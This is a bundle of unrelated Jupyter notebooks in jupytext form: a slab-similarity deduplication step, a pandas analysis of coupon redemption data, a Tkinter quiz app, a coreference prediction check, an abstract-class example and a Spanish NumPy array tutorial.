ident_pair_2 = np.sort(ident_pair_i)
ids_to_remove.append(ident_pair_2[0])
num_ids_to_remove = len(ids_to_remove)
if verbose_local:
print("ids_to_remove:", ids_to_remove)
# #####################################################
data_dict_i["bulk_id"] = bulk_id_i
data_dict_i["slab_ids_to_remove"] = ids_to_remove
data_dict_i["num_ids_to_remove"] = num_ids_to_remove
# #####################################################
data_dict_list.append(data_dict_i)
# #####################################################
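# The loop above keeps one slab per identical pair (sorting the pair and removing the first id); a minimal standalone sketch of that step with toy ids, which skips the "id already removed" edge case handled above:

```python
# Toy identical pairs; keep the lexicographically first id of each pair for removal
pairs = [("b", "a"), ("c", "d")]
ids_to_remove = [sorted(pair)[0] for pair in pairs]
print(ids_to_remove)  # ['a', 'c']
```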
# +
df_slab_simil = pd.DataFrame(data_dict_list)
df_slab_simil
# -
# Pickling data ###########################################
import os; import pickle
directory = os.path.join(
os.environ["PROJ_irox_oer"],
"workflow/creating_slabs/slab_similarity",
"out_data")
if not os.path.exists(directory): os.makedirs(directory)
with open(os.path.join(directory, "df_slab_simil.pickle"), "wb") as fle:
pickle.dump(df_slab_simil, fle)
# #########################################################
from methods import get_df_slab_simil
df_slab_simil = get_df_slab_simil()
df_slab_simil
assert False
# + active=""
#
#
#
# + jupyter={"source_hidden": true}
# ident_slab_pairs_i = [
# ['bimamuvo_42', 'hid<PASSWORD>ha_44'],
# ['legifipe_18', 'witepote_55'],
# ]
# ids_to_remove = []
# for ident_pair_i in ident_slab_pairs_i:
# # Checking if any id already added to `id_to_remove` is in a new pair
# for i in ids_to_remove:
# if i in ident_pair_i:
# print("This case needs to be dealt with more carefully")
# break
# ident_pair_2 = np.sort(ident_pair_i)
# ids_to_remove.append(ident_pair_2[0])
# + jupyter={"source_hidden": true}
# identical_pairs_list = [
# ["a", "b"],
# ["b", "a"],
# ["c", "d"],
# ]
# # identical_pairs_list_2 =
# # list(np.unique(
# # [np.sort(i) for i in identical_pairs_list]
# # ))
# np.unique(
# [np.sort(i) for i in identical_pairs_list]
# )
# + jupyter={"source_hidden": true}
# import itertools
# lst = identical_pairs_list
# lst.sort()
# lst = [list(np.sort(i)) for i in lst]
# identical_pairs_list_2 = list(lst for lst, _ in itertools.groupby(lst))
# + jupyter={"source_hidden": true}
# def get_identical_slabs(
# D_ij,
# min_thresh=1e-5,
# ):
# """
# """
# #| - get_identical_slabs
# # #########################################################
# # min_thresh = 1e-5
# # #########################################################
# identical_pairs_list = []
# for slab_id_i in D_ij.index:
# for slab_id_j in D_ij.index:
# if slab_id_i == slab_id_j:
# continue
# if slab_id_i == slab_id_j:
# print("Not good if this is printed")
# d_ij = D_ij.loc[slab_id_i, slab_id_j]
# if d_ij < min_thresh:
# # print(slab_id_i, slab_id_j)
# identical_pairs_list.append((slab_id_i, slab_id_j))
# # #########################################################
# identical_pairs_list_2 = list(np.unique(
# [np.sort(i) for i in identical_pairs_list]
# ))
# return(identical_pairs_list_2)
# #__|
# + jupyter={"source_hidden": true}
# # #########################################################
# import pickle; import os
# path_i = os.path.join(
# os.environ["PROJ_irox_oer"],
# "workflow/creating_slabs/slab_similarity",
# "out_data/df_slab_simil.pickle")
# with open(path_i, "rb") as fle:
# df_slab_simil = pickle.load(fle)
# # #########################################################
# + jupyter={"source_hidden": true}
# /home/raulf2012/Dropbox/01_norskov/00_git_repos/PROJ_IrOx_OER/workflow/creating_slabs/slab_similarity
# workflow/creating_slabs/slab_similarity
|
workflow/creating_slabs/slab_similarity/slab_similarity.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %matplotlib inline
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import math
import re
from datetime import datetime
import warnings
warnings.filterwarnings("ignore")
# ### Online and Offline Training data
# +
df_on = pd.read_csv('DataSets/ccf_online_stage1_train.csv')
df_off = pd.read_csv('DataSets/ccf_offline_stage1_train.csv')
# -
print("Online Training Data Sample\nShape:"+str(df_on.shape))
df_on.head()
print("Offline Training Data Sample\nShape:"+str(df_off.shape))
df_off.head()
# ### TEST DATA (OFFLINE)
df_test = pd.read_csv('DataSets/ccf_offline_stage1_test_revised.csv')
print("Testing Data(Offline) Sample\nShape:"+str(df_test.shape))
df_test.head()
# ### Converting Coupon to String type
# +
print('Data type of coupon in different datasets\nOnline: '+str(df_on['Coupon_id'].dtypes)+'\nOffline: '+
str(df_off['Coupon_id'].dtypes))
df_off['Coupon_id'] = [int(i) if i==i else i for i in df_off['Coupon_id']]
df_off['Coupon_id'] = df_off['Coupon_id'].apply(lambda x: "{:.0f}".
format(x) if not pd.isnull(x) else x)
print('After conversion, data type of coupon in different datasets\nOnline: '+str(df_on['Coupon_id'].dtypes)+'\nOffline: '+
str(df_off['Coupon_id'].dtypes))
# -
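# The `"{:.0f}".format` step above drops the trailing `.0` that a float Coupon_id would otherwise keep when converted to a string:

```python
# Formatting a float coupon id (made-up value) as a no-decimal string
coupon = 1439.0
print(str(coupon))               # "1439.0"
print("{:.0f}".format(coupon))   # "1439"
```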
# #### Converting Date to DateTime format
# +
#Online Training Data
df_on['Date'] = pd.to_datetime(df_on["Date"],format='%Y%m%d')
df_on['Date_received'] = pd.to_datetime(df_on["Date_received"],format='%Y%m%d')
#Offline Training Data
df_off['Date'] = pd.to_datetime(df_off["Date"],format='%Y%m%d')
df_off['Date_received'] = pd.to_datetime(df_off["Date_received"],format='%Y%m%d')
# -
# ### Removing Duplicates from Online and Offline Training Data
# +
#Removing duplicates and giving frequency counts(Count) to each row
#Online
x = 'g8h.|$hTdo+jC9^@' #garbage sentinel stands in for nan values so groupby keeps them
df_on_unique = (df_on.fillna(x).groupby(['User_id', 'Merchant_id', 'Action', 'Coupon_id', 'Discount_rate',
'Date_received', 'Date']).size().reset_index()
.rename(columns={0 : 'Count'}).replace(x,np.NaN))
df_on_unique["Date_received"]=pd.to_datetime(df_on_unique["Date_received"])
df_on_unique["Date"]=pd.to_datetime(df_on_unique["Date"])
print("Online Training Data Shape:"+str(df_on_unique.shape))
# +
#Offline
x = 'g8h.|$hTdo+jC9^@' #garbage value for nan values
df_off_unique = (df_off.fillna(x).groupby(['User_id', 'Merchant_id', 'Coupon_id', 'Discount_rate', 'Distance',
'Date_received', 'Date']).size().reset_index()
.rename(columns={0 : 'Count'}).replace(x,np.NaN))
df_off_unique["Date_received"]=pd.to_datetime(df_off_unique["Date_received"])
df_off_unique["Date"]=pd.to_datetime(df_off_unique["Date"])
print("Offline Training Data Shape:"+str(df_off_unique.shape))
# -
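# The sentinel fill before `groupby` is needed because NaN never compares equal to itself, so NaN keys would be lost when grouping; a quick check of that property:

```python
import math

nan = float("nan")
print(nan == nan)        # False: NaN is not equal to itself
print(math.isnan(nan))   # True: detecting NaN requires isnan, not ==
```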
# #### Filling Nan for Distance (OFFLINE)
df_off_unique['Distance'].fillna(df_off_unique['Distance'].mean(), inplace=True)
df_off_unique['Distance'] = df_off_unique.Distance.astype(int)
# ### Converting Discount Ratio to Rate
# +
#Function to convert discount ratio to discount rate
def convert_discount(discount):
values = []
for i in discount:
if ':' in i:
i = i.split(':')
rate = round((int(i[0]) - int(i[1]))/int(i[0]),3)
values.append([int(i[0]),int(i[1]),rate])
elif '.' in i:
i = float(i)
x = 100*i
values.append([100,int(100-x),i])
discounts = dict(zip(discount,values))
return discounts
# convert_discount(list(df_of['Discount_rate']))
# -
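# A standalone restatement of the parsing logic in `convert_discount` above, checked on the two formats it handles ("spend:save" and a direct rate):

```python
def convert_discount(discount):
    """Map each discount string to [original_price, discount, rate]."""
    values = []
    for i in discount:
        if ":" in i:                       # "30:5" means spend 30, save 5
            spend, save = (int(v) for v in i.split(":"))
            values.append([spend, save, round((spend - save) / spend, 3)])
        elif "." in i:                     # "0.9" is already a rate
            r = float(i)
            values.append([100, int(100 - 100 * r), r])
    return dict(zip(discount, values))

print(convert_discount(["30:5", "0.9"]))
```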
#ONLINE DATA
df_on_coupon = df_on_unique[(df_on_unique['Coupon_id'].isna()==False) & (df_on_unique['Coupon_id']!='fixed')]
discounts_online = list(df_on_coupon['Discount_rate'].unique())
df_on_coupon.loc[:,('Discount')] = df_on_coupon.loc[:,('Discount_rate')]
df_on_coupon.loc[:,('Discount_rate')] = df_on_coupon[df_on_coupon['Coupon_id']!='fixed'].loc[:,('Discount')].map(convert_discount(discounts_online))
df_on_coupon[['Original_price','Discounted_price','Rate']] = pd.DataFrame(df_on_coupon['Discount_rate'].values.tolist(), index= df_on_coupon.index)
df_on_coupon.head()
df_on_coupon = df_on_coupon.append(df_on_unique[df_on_unique['Coupon_id']=='fixed'], sort=False)
df_on_coupon.shape, df_on_unique[df_on_unique['Coupon_id'].isna()==False].shape
#OFFLINE DATA
df_off_coupon = df_off_unique[(df_off_unique['Coupon_id'].isna()==False)].copy()
discounts_offline = list(df_off_coupon['Discount_rate'].unique())
df_off_coupon.loc[:,('Discount')] = df_off_coupon.loc[:,('Discount_rate')]
df_off_coupon['Discount_rate'] = df_off_coupon['Discount'].map(convert_discount(discounts_offline))
df_off_coupon[['Original_price','Discounted_price','Rate']] = pd.DataFrame(df_off_coupon.Discount_rate.values.tolist(), index= df_off_coupon.index)
df_off_coupon.head()
# ### Training Data (Online + Offline)
df_train = df_on_unique.append(df_off_unique, sort=False)
df_train = df_train.sort_values(by = ['User_id'] )
df_train = df_train.reset_index()
del df_train['index']
print("Training Data(Offline+Online) \nShape:"+str(df_train.shape))
df_train.head()
# ### Distributing users into three categories:
# 1. users getting coupon
# 2. users making purchases without coupon
# 3. users making purchases with coupon
df_off_redeem_coupon = df_off_unique[(df_off_unique['Date'].isna()==False) & (df_off_unique['Coupon_id'].isna()==False)]
df_on_redeem_coupon = df_on_unique[(df_on_unique['Date'].isna()==False) & (df_on_unique['Coupon_id'].isna()==False)]
df_train_coupon = df_on_coupon.append(df_off_coupon, sort=False)
# ## Coupon Analysis
# ## Coupon Distribution for Online, Offline and Test Datasets
coupon_off = set(df_off['Coupon_id'].unique())
coupon_on = set(df_on['Coupon_id'].unique())
coupon_test = set(df_test['Coupon_id'].unique())
len(coupon_off),len(coupon_on),len(coupon_test)
coupon_on_off = coupon_on.intersection(coupon_off)
coupon_on_test = coupon_on.intersection(coupon_test)
coupon_test_off = coupon_test.intersection(coupon_off)
len(coupon_on_off), len(coupon_on_test), len(coupon_test_off)
coupon_only_off = coupon_off - coupon_test
coupon_only_test = coupon_test - coupon_off
len(coupon_only_off),len(coupon_only_test)
# <img src ="imgs/CouponDistribution.png" width="60%">
# ### Merchant is constant for a particular Coupon ID
coupon_merchant = pd.DataFrame(df_train_coupon.groupby(['Coupon_id'])['Merchant_id'].nunique())
coupon_merchant.columns = ['NumberOfMerchants']
coupon_merchant['NumberOfMerchants'].nunique()
# ### Discount Rate is constant for a particular Coupon ID
coupon_discount = pd.DataFrame(df_train_coupon.groupby(['Coupon_id'])['Rate'].nunique())
coupon_discount.columns = ['NumberOfDiscounts']
coupon_discount['NumberOfDiscounts'].nunique()
# ### Coupon Redemption Score
#Coupon in offline Dataset
coupon_redemption = pd.DataFrame(df_train_coupon.groupby(['Coupon_id'])[['Date_received','Date']].count()).reset_index()
coupon_redemption.columns = ['Coupon_id','Coupon_Released', 'Coupon_Redeemed']
coupon_redemption['Coupon_Ratio'] = round(coupon_redemption['Coupon_Redeemed']/coupon_redemption['Coupon_Released'],2)
coupon_redemption.head()
plt.figure(figsize=(8,5))
sns.distplot(coupon_redemption['Coupon_Ratio'],kde=False,bins=26)
plt.xlabel('Coupon Redemption Ratio')
plt.ylabel('Count of Coupon')
plt.title('Coupon Redemption Score Distribution (OFFLINE)')
plt.show()
# ### Distance Distribution with respect to coupon redemption
plt.figure(figsize=(9,7))
ax = sns.countplot(df_off_redeem_coupon['Distance'])
ax.set_xticklabels(ax.get_xticklabels(),rotation=90)
for p in ax.patches:
ax.annotate('{:.0f}'.format(p.get_height()), (p.get_x()+0.1, p.get_height()+50))
plt.xlabel('Distance between users and merchants')
plt.ylabel('Count of Coupon Redeemed for that discount')
plt.title('Coupon Redemption and the Distance of User')
plt.show()
# ### Duration of coupon
coupon_duration = df_train_coupon.copy()
coupon_duration['DateTrack'] = coupon_duration['Date']
coupon_duration.DateTrack.fillna(coupon_duration.Date_received, inplace=True)
coupon_duration.head()
coupon_duration_days =pd.DataFrame(coupon_duration.groupby(['Coupon_id'])['DateTrack'].agg(['min','max'])).reset_index()
coupon_duration_days.columns = ['Coupon_id','StartDate', 'EndDate']
coupon_duration_days['Duration'] = coupon_duration_days['EndDate'] - coupon_duration_days['StartDate']
coupon_duration_days.head()
coupon_duration_days['Duration'] = coupon_duration_days['Duration'].dt.days
coupon_duration_days.head()
plt.figure(figsize=(8,5))
ax = sns.distplot(coupon_duration_days['Duration'],kde=False,bins=26)
plt.xlabel('Active Duration of Coupons(days)')
plt.ylabel('Count of Coupons')
plt.title('Coupon and their Duration time(days)')
for p in ax.patches:
ax.annotate('{:.0f}'.format(p.get_height()), (p.get_x()+0.1, p.get_height()+50))
coupon_duration_days['Duration'].describe()
# ## Coupon and its redemption list
coupon_days = df_train_coupon[df_train_coupon['Date'].isna()==False]
coupon_days['First_day'] = pd.to_datetime('20160101',format='%Y%m%d')
coupon_days['DayNum'] = coupon_days['Date'] - coupon_days['First_day']
coupon_days['DayNum'] = coupon_days['DayNum'].dt.days + 1
coupon_days.head()
coupon_days = pd.DataFrame(coupon_days.groupby(['Coupon_id'])['DayNum'].apply(list).reset_index(name='RedemptionList'))
coupon_days['RedemptionList'] = coupon_days['RedemptionList'].apply(lambda x : sorted(set(x)))
coupon_days
# ## Coupon Level Features
coupon_redemption
# +
coupon_level_data = coupon_redemption.merge(coupon_duration_days,how='left',on='Coupon_id')
coupon_level_data = coupon_level_data.drop(columns=['StartDate','EndDate'])
#Coupon Redemtion day list
coupon_level_data = pd.merge(coupon_level_data,coupon_days,how='left',on='Coupon_id')
for row in coupon_level_data.loc[coupon_level_data.RedemptionList.isnull(), 'RedemptionList'].index:
coupon_level_data.at[row, 'RedemptionList'] = []
coupon_level_data
# -
coupon_level_data.to_csv('DataSets/DatasetsCreated/coupon_level.csv',index=False)
coupon_level_data.isna().sum()
coupon_level_data.shape
df_train['Coupon_id'].nunique()
coupon_level_data[coupon_level_data['Coupon_id']=='fixed']
|
Approach2/CouponLevelAnalysis.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # <font color='slateblue'><center>GUI QUIZ GAME APP</center></font>
# # Problem Statement
# - This is a standard quiz application that presents a questionnaire to the user, allows them to answer it, and displays the correct answer if they are wrong.
#
# - We will be developing a simple multiple-choice quiz in python with GUI using Tkinter.
# - Each test will display the final score of the user.
#
# - The application will have an account creation option, wherein some users can be appointed as Admins
# ## Importing required Libraries
from tkinter import * # tkinter library to show GUI screen of quiz.
from base64 import b64decode # base64 library is used to decode json file.
import io # io library to manage file related input output.
import json # json library to load json files.
from tkinter import messagebox as mb # messagebox is used to display result of quiz.
# ## Uploading JSON Data File
# +
# base_file contains encoded json file.
base_file = "<KEY>
# io_file contains Bytes.IO file after decoding base_file.
io_file = io.BytesIO(b64decode(base_file))
# json_file contains bytes file decoded using io_file.
json_file = io_file.getvalue()
# data_file contains json output file as a dictionary.
data_file = json.loads(json_file)
# -
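# A round-trip sketch of the decode chain above (base64 -> BytesIO -> bytes -> dict), using a toy payload in place of the real encoded question file:

```python
import io
import json
from base64 import b64decode, b64encode

# Toy payload standing in for the real encoded question file
encoded = b64encode(json.dumps({"question": "2+2?", "answer": 4}).encode())
decoded = json.loads(io.BytesIO(b64decode(encoded)).getvalue())
print(decoded)  # {'question': '2+2?', 'answer': 4}
```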
# ## QUIZ GAME Program
# +
# Class Quiz_Question which contains methods to check answers, displaying quiz UI, and buttons for quit and next.
# a class to define the components of the GUI
class quiz_question:
# Constructor of class quiz_question which sets the question count to 0 and initializes all the
# other methods to display the content and make all the functionality available.
def __init__(self):
'''Constructor method'''
# initially, set question number to 0
self.question_no=0
# function to display title of quiz .
self.title_function()
# function assigns question to the display_question function to update later.
self.display_question()
# function to store selected option as integer value
self.select_opt=IntVar()
# function to display radio button for the current question
self.options=self.radio_button()
# function to display options for the current question
self.display_options()
# function to display the button for next and quit.
self.buttons()
# no of questions
self.data_size=len(questions_file)
# keep a counter of correct answers
self.correct_ans=0
# This method is used to Display Title of GUI Screen
def title_function(self):
'''Displaying Title of QUIZ'''
# title to be shown
title = Label(gui, text="QUIZ APP", width=50, bg="magenta",fg="white", font=("ariel", 20, "bold"))
# place of the title
title.place(x=0, y=2)
# This method shows the current Question on the screen
def display_question(self):
'''Function to display questions'''
# setting the Question properties
question_no_label = Label(gui, text=question[self.question_no], width=60, font=('ariel' ,16, 'bold'), anchor= 'w' )
#placing the option on the screen
question_no_label.place(x=70, y=100)
# This method displays the options and clears them every time before displaying the next question
def display_options(self):
'''Function to display options for questions'''
val=0
# deselecting the options
self.select_opt.set(0)
        # loop over the options of the current question to set the radio button labels
        for option in options_file[self.question_no]:
self.options[val]['text']=option
val+=1
# This method is used to display the result and display correct and wrong answers
def display_result(self):
'''Function to display result after end of quiz'''
# to calculate the wrong answers count and correct answers count.
wrong_count = self.data_size - self.correct_ans
correct = f"Correct: {self.correct_ans}"
wrong = f"Wrong: {wrong_count}"
# calculate the percentage of correct answers
score = int(self.correct_ans / self.data_size * 100)
result = f"Score: {score}%"
# Shows a message box to display the result
mb.showinfo("Result", f"{result}\n{correct}\n{wrong}")
    # This method checks the answer after we click on Next.
    def check_ans(self, question_no):
        '''To check correct answers'''
        # return True if the selected option matches the correct answer
        return self.select_opt.get() == answers_file[question_no]
# Method to check answer of question to increment correct answer count.
# On pressing next button, it shows next question with options.
# On last question, it shows result of quiz.
def check_button_function(self):
'''to check which button to call'''
# Check if the answer is correct and if the answer is correct it increments the correct by 1
if self.check_ans(self.question_no):
self.correct_ans += 1
# Move to next Question by incrementing the question_no counter
self.question_no += 1
        # if all questions have been answered, display the score
        # and close the quiz window
if self.question_no==self.data_size:
end_button = Button(gui, text="QUIZ ENDED",command=self.check_button_function, width=10,bg="teal",fg="white",font=("ariel",16,"bold"))
end_button.place(x=350,y=380)
self.display_result()
# destroys the GUI screen
gui.destroy()
# shows the next question
else:
self.display_question()
self.display_options()
# This method shows the two buttons on the screen.
# The first one is the next_button which moves to next question
# The second button is the exit button which is used to close the GUI without completing the quiz.
def buttons(self):
'''To show next and quit buttons'''
# The first button is the Next button to move to the next Question
next_button = Button(gui, text="NEXT",command=self.check_button_function,
width=10,bg="teal",fg="white",font=("ariel",16,"bold"))
        # placing the button on the screen
next_button.place(x=350,y=380)
# This is the second button which is used to Quit the GUI
        quit_button = Button(gui, text="QUIT", command=gui.destroy, width=5,bg="red", fg="white",font=("ariel",16,"bold"))
# placing the Quit button on the screen
quit_button.place(x=700,y=50)
# To display radio buttons at specified position
def radio_button(self):
'''Function to display radio buttons'''
        # start with an empty list of radio buttons
q_list = []
# position of the first option
y_pos = 150
# adding the options to the list
while len(q_list) < 4:
# setting the radio button properties
radio_btn = Radiobutton(gui,text=" ",variable=self.select_opt, value = len(q_list)+1,font = ("ariel",14))
# adding the button to the list
q_list.append(radio_btn)
# placing the button
radio_btn.place(x = 100, y = y_pos)
# incrementing the y-axis position by 40
y_pos += 40
# return the radio buttons
return q_list
# To create a GUI Window for Quiz Game
gui = Tk()
# set the size of the GUI Window
gui.geometry("800x450")
# set the title of the Window
gui.title("GUI Quiz App")
# to set background color of window
gui.configure(bg='azure')
# get the data from the json file
# set the question, options, and answer files
questions_file = data_file['question']
options_file = data_file['options']
answers_file = data_file['answer']
# create an object of the quiz_question class.
quiz = quiz_question()
# Start the GUI
gui.mainloop()
# END OF THE QUIZ PROGRAM
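The quiz expects `data_file` to be a dictionary with parallel `question`, `options`, and `answer` lists. This schema is inferred from the code above, so treat the snippet below as an illustrative sketch of the expected JSON, not the original data file:

```python
import json

# Hypothetical quiz data matching the keys the quiz_question class reads.
sample = {
    "question": ["What does GUI stand for?"],
    "options": [["Graphical User Interface", "General Utility Input",
                 "Guided User Install", "None of these"]],
    # answers are 1-based, matching the Radiobutton values (1..4)
    "answer": [1],
}

data_file = json.loads(json.dumps(sample))
questions_file = data_file["question"]
options_file = data_file["options"]
answers_file = data_file["answer"]
print(len(questions_file), answers_file[0])
```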
|
GUI Quiz Application/Project - GUI Quiz App.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import json
import jsonlines
import pandas as pd
prediction_output = 'r001.out.predict'
with jsonlines.open(prediction_output) as reader:
for obj in reader:
print(obj['clusters'])
print(obj['sentences'])
print(obj['predicted_clusters'])
len(obj['sentences'][0])
# ## Gold clusters
# +
trans1 = []
trans2 = []
trans3 = []
clusters = 'clusters'
for i in range(len(obj[clusters])):
#print(obj['clusters'][i])
for j in range(len(obj[clusters][i])):
#print(obj[clusters][i][j])
if obj[clusters][i][j][0] < len(obj['sentences'][0]):
start = obj[clusters][i][j][0]
end = obj[clusters][i][j][1]
trans1 = obj['sentences'][0][start:end+1]
#print(obj['sentences'][0][start:end+1])
        if obj[clusters][i][j][0] >= len(obj['sentences'][0]):  # span starts in the second sentence
start = obj[clusters][i][j][0] - len(obj['sentences'][0])
end = obj[clusters][i][j][1] - len(obj['sentences'][0])
trans1 = obj['sentences'][1][start:end+1]
#print(obj['sentences'][0][start-1:end+1])
trans2.append(trans1)
#print('trans2: ', trans2)
trans1 = []
trans3.append(trans2)
#print('trans3: ', trans3)
trans2 = []
print(trans3)
# -
# ## Predicted clusters
# +
trans1 = []
trans2 = []
trans3 = []
clusters = 'predicted_clusters'
for i in range(len(obj[clusters])):
#print(obj['clusters'][i])
for j in range(len(obj[clusters][i])):
#print(obj[clusters][i][j])
if obj[clusters][i][j][0] < len(obj['sentences'][0]):
start = obj[clusters][i][j][0]
end = obj[clusters][i][j][1]
trans1 = obj['sentences'][0][start:end+1]
#print(obj['sentences'][0][start:end+1])
        if obj[clusters][i][j][0] >= len(obj['sentences'][0]):  # span starts in the second sentence
start = obj[clusters][i][j][0] - len(obj['sentences'][0])
end = obj[clusters][i][j][1] - len(obj['sentences'][0])
trans1 = obj['sentences'][1][start:end+1]
#print(obj['sentences'][0][start-1:end+1])
trans2.append(trans1)
#print('trans2: ', trans2)
trans1 = []
trans3.append(trans2)
#print('trans3: ', trans3)
trans2 = []
print(trans3)
# -
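The gold and predicted blocks above are identical except for the cluster key, so they can be collapsed into one helper. This is a sketch: `demo_rec` is a synthetic stand-in with the same `sentences`/cluster structure as the jsonlines records.

```python
def cluster_tokens(rec, key):
    """Map each cluster of (start, end) token spans to token strings.

    Span indices are flat positions over the concatenated sentences;
    indices at or past len(sentences[0]) fall in the second sentence.
    """
    first_len = len(rec['sentences'][0])
    result = []
    for cluster in rec[key]:
        mentions = []
        for start, end in cluster:
            if start < first_len:
                mentions.append(rec['sentences'][0][start:end + 1])
            else:
                # shift the span into the second sentence's index space
                mentions.append(rec['sentences'][1][start - first_len:end - first_len + 1])
        result.append(mentions)
    return result

# tiny synthetic record with the same shape as the jsonlines objects
demo_rec = {
    'sentences': [['Alice', 'went', 'home'], ['She', 'slept']],
    'clusters': [[[0, 0], [3, 3]]],
}
print(cluster_tokens(demo_rec, 'clusters'))  # [[['Alice'], ['She']]]
```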
|
check_prediction.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + pycharm={"name": "#%%\n"}
from abc import ABC, abstractmethod
class Automobile(ABC):
def __init__(self):
print('Automobile created')
@abstractmethod
def start(self):
print('start of automobile called')
class Car(Automobile):
def start(self):
super().start()
print('Start of car called')
c = Car()
c.start()
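A quick check (not in the original notebook) that the abstract base class itself cannot be instantiated — attempting to do so raises a TypeError:

```python
from abc import ABC, abstractmethod

class Automobile(ABC):
    def __init__(self):
        print('Automobile created')

    @abstractmethod
    def start(self):
        print('start of automobile called')

# Instantiating a class with unimplemented abstract methods raises TypeError.
try:
    a = Automobile()
except TypeError as e:
    print('Cannot instantiate:', e)
```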
|
07. OOPS Part-3/01. Abstract classes.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Numpy, Statistics, Probability
#
# ## Numpy Array
#
# An array is a data structure that groups several values or elements under a single variable (a single name).
#
# All the elements of an array share the same type (unlike Python lists).
#
# One- and two-dimensional arrays have names of their own:
#
# * a one-dimensional array is a **vector**
#
# * a two-dimensional array is a **table** or **matrix**
#
# Arrays with three or more dimensions are called N-dimensional.
#
#
# 
#
# ---
# ### Constructor
#
# #### Documentation
# https://docs.scipy.org/doc/numpy/reference/generated/numpy.array.html
#
# The simplest way to build an array is to call the constructor with a single parameter:
# `numpy.array(object)`
# where object is a collection of elements.
#
# Let's see an example:
# + pycharm={"name": "#%%\n"}
import numpy as np
# + pycharm={"name": "#%%\n"}
# A Python list
python_list = [1, 4, 2, 5, 3]
# An integer array instantiated from the list:
my_numpy_array = np.array(python_list)
# Print the resulting numpy array
print(my_numpy_array)
# -
# ### Array-creation methods
#
# #### Documentation
# https://docs.scipy.org/doc/numpy/reference/routines.array-creation.html
#
# Numpy provides methods to create and initialize arrays with particular characteristics.
#
# We can create arrays that are empty, filled with zeros or ones, a sequence, random values, or values drawn from a given distribution.
#
# #### Array of random values with a normal distribution
#
# Now we will see how to instantiate an array of random numbers that follow a normal distribution.
#
# ##### Documentation
# https://docs.scipy.org/doc/numpy/reference/random/index.html
#
# https://docs.scipy.org/doc/numpy/reference/random/generator.html
#
# https://docs.scipy.org/doc/numpy/reference/random/generated/numpy.random.Generator.normal.html#numpy.random.Generator.normal
#
# The method that generates normally distributed random numbers takes as parameters the mean, the standard deviation, and the dimensions of the output array:
#
# `Generator.normal(loc=0.0, scale=1.0, size=None)`
#
# We create a default Generator instance:
# + pycharm={"name": "#%%\n"}
random_generator = np.random.default_rng()
# -
# Now we generate 12 numbers from a normal distribution with mean 0 and standard deviation 1:
# + pycharm={"name": "#%%\n"}
random_generator.normal(loc = 0, scale = 1, size = 12)
# -
# Now we generate a matrix of 16 rows and 4 columns of numbers from a normal distribution with mean 0 and standard deviation 1:
# + pycharm={"name": "#%%\n"}
random_generator.normal(0, 1, size = (16,4))
# -
# Note that every time we run the line `random_generator.normal(loc = 0, scale = 1, size = 12)` we get different values for the array elements.
#
# Try running it three or four times...
#
# The same happens with `random_generator.normal(0, 1, size = (16,4))`
#
# If we want the same result on every run, we must initialize the seed of the random number generator.
#
# To do that, we initialize the `Generator` instance with an arbitrary but fixed seed:
# + pycharm={"name": "#%%\n"}
seed_cualquier_numero = 2843
random_generator_seed = np.random.default_rng(seed_cualquier_numero)
# -
# Now let's run the same lines as above several times, using the random_generator_seed object initialized with a fixed seed:
# + pycharm={"name": "#%%\n"}
random_generator_seed = np.random.default_rng(seed_cualquier_numero)
random_generator_seed.normal(loc = 0, scale = 1, size = 12)
# + pycharm={"name": "#%%\n"}
random_generator_seed = np.random.default_rng(seed_cualquier_numero)
random_generator_seed.normal(0, 1, size = (16,4))
# -
# <a id="section_atributos"></a>
# ### Attributes
#
# #### Documentation
#
# https://docs.scipy.org/doc/numpy/reference/arrays.ndarray.html#array-attributes
#
# Let's look at attribute examples on a three-dimensional array of uniformly distributed random numbers, with shape 3 * 4 * 5.
#
# Uniformly distributed random number generator:
#
# https://docs.scipy.org/doc/numpy/reference/random/generated/numpy.random.Generator.uniform.html#numpy.random.Generator.uniform
# + pycharm={"name": "#%%\n"}
random_generator_seed = np.random.default_rng(seed_cualquier_numero)
low = 10  # the lower bound is included
high = 50  # the upper bound is not included
size = (3, 4, 5)
array_3D = random_generator_seed.uniform(low, high, size)
array_3D
# -
# <a id="section_atributos_ndim"></a>
# #### ndim
#
# Number of dimensions of the array
# + pycharm={"name": "#%%\n"}
array_3D.ndim
# -
# <a id="section_atributos_shape"></a>
# #### shape
#
# Tuple with the dimensions of the array
# + pycharm={"name": "#%%\n"}
array_3D.shape
# + pycharm={"name": "#%%\n"}
type(array_3D.shape)
# -
# > Observation: `len(array_3D.shape) == array_3D.ndim`
# <a id="section_atributos_size"></a>
# #### size
#
# Number of elements in the array
# + pycharm={"name": "#%%\n"}
array_3D.size
# -
# > Observation: `np.prod(array_3D.shape) == array_3D.size`
# >
# > `np.prod` multiplies all the elements of the tuple
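Both observations can be checked directly. A quick sketch (not part of the original notebook) that uses a zeros array with the same 3 * 4 * 5 shape as `array_3D`:

```python
import numpy as np

demo_3d = np.zeros((3, 4, 5))  # same shape as the array_3D above

assert len(demo_3d.shape) == demo_3d.ndim      # ndim == length of the shape tuple
assert np.prod(demo_3d.shape) == demo_3d.size  # size == product of the dimensions
print(demo_3d.ndim, demo_3d.size)  # 3 60
```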
# <a id="section_atributos_dtype"></a>
# #### dtype
# [back to TOC](#section_toc)
#
# Data type of the elements that make up the array
# + pycharm={"name": "#%%\n"}
array_3D.dtype
# -
# <a id="section_indexing"></a>
# ### Indexing
#
# A common problem is selecting the elements of an array according to some criterion.
#
# "Indexing" is the operation that solves the problem of accessing the elements of an array by some criterion.
#
# There are three kinds of indexing in Numpy:
#
# * **Array Slicing**: we access elements with the start, stop, and step parameters.
